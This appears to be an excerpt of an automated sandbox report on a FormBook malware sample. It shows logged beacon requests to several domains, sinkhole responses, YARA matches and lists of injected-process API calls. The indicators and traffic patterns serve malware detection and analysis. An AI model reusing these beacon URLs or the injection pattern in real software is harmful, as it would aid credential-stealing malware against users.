Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:17:53 GMTServer: X-SinkHole: Malware DNS SinkHole ServerContent-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1Host: www.logansshop.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1Host: www.exit-divorce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1Host: www.splendidhotelspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1Host: www.stnanguo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 45.77.226.209 45.77.226.209
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1Host: www.logansshop.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1Host: www.exit-divorce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1Host: www.splendidhotelspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1Host: www.stnanguo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.herbmedia.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:16:25 GMTServer: X-SinkHole: Malware DNS SinkHole ServerContent-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
          Source: explorer.exe, 00000006.00000003.291409665.00000000089DC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000006.00000000.264819810.000000000F440000.00000004.00000001.sdmpString found in binary or memory: http://logo.verisign
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004181C0 NtCreateFile,5_2_004181C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00418270 NtReadFile,5_2_00418270
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004182F0 NtClose,5_2_004182F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,5_2_004183A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004181BA NtCreateFile,5_2_004181BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041826A NtReadFile,5_2_0041826A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409540 NtReadFile,LdrInitializeThunk,5_2_05409540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054095D0 NtClose,LdrInitializeThunk,5_2_054095D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409710 NtQueryInformationToken,LdrInitializeThunk,5_2_05409710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409FE0 NtCreateMutant,LdrInitializeThunk,5_2_05409FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409780 NtMapViewOfSection,LdrInitializeThunk,5_2_05409780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054097A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_054097A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_05409660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054096E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_054096E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_05409910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054099A0 NtCreateSection,LdrInitializeThunk,5_2_054099A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409840 NtDelayExecution,LdrInitializeThunk,5_2_05409840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409860 NtQuerySystemInformation,LdrInitializeThunk,5_2_05409860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054098F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_054098F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A50 NtCreateFile,LdrInitializeThunk,5_2_05409A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_05409A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A20 NtResumeThread,LdrInitializeThunk,5_2_05409A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409560 NtWriteFile,5_2_05409560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409520 NtWaitForSingleObject,5_2_05409520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540AD30 NtSetContextThread,5_2_0540AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054095F0 NtQueryInformationFile,5_2_054095F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409760 NtOpenProcess,5_2_05409760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409770 NtSetInformationFile,5_2_05409770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540A770 NtOpenThread,5_2_0540A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540A710 NtOpenProcessToken,5_2_0540A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409730 NtQueryVirtualMemory,5_2_05409730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409650 NtQueryValueKey,5_2_05409650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409670 NtQueryInformationProcess,5_2_05409670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409610 NtEnumerateValueKey,5_2_05409610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054096D0 NtCreateKey,5_2_054096D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409950 NtQueueApcThread,5_2_05409950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054099D0 NtCreateProcessEx,5_2_054099D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540B040 NtSuspendThread,5_2_0540B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409820 NtEnumerateKey,5_2_05409820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054098A0 NtWriteVirtualMemory,5_2_054098A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409B00 NtSetValueKey,5_2_05409B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540A3B0 NtGetContextThread,5_2_0540A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A10 NtQuerySection,5_2_05409A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A80 NtOpenDirectoryObject,5_2_05409A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E595D0 NtClose,LdrInitializeThunk,8_2_04E595D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59540 NtReadFile,LdrInitializeThunk,8_2_04E59540
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E596E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04E596E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E596D0 NtCreateKey,LdrInitializeThunk,8_2_04E596D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04E59660
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59650 NtQueryValueKey,LdrInitializeThunk,8_2_04E59650
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59FE0 NtCreateMutant,LdrInitializeThunk,8_2_04E59FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59780 NtMapViewOfSection,LdrInitializeThunk,8_2_04E59780
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59710 NtQueryInformationToken,LdrInitializeThunk,8_2_04E59710
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59860 NtQuerySystemInformation,LdrInitializeThunk,8_2_04E59860
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59840 NtDelayExecution,LdrInitializeThunk,8_2_04E59840
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E599A0 NtCreateSection,LdrInitializeThunk,8_2_04E599A0
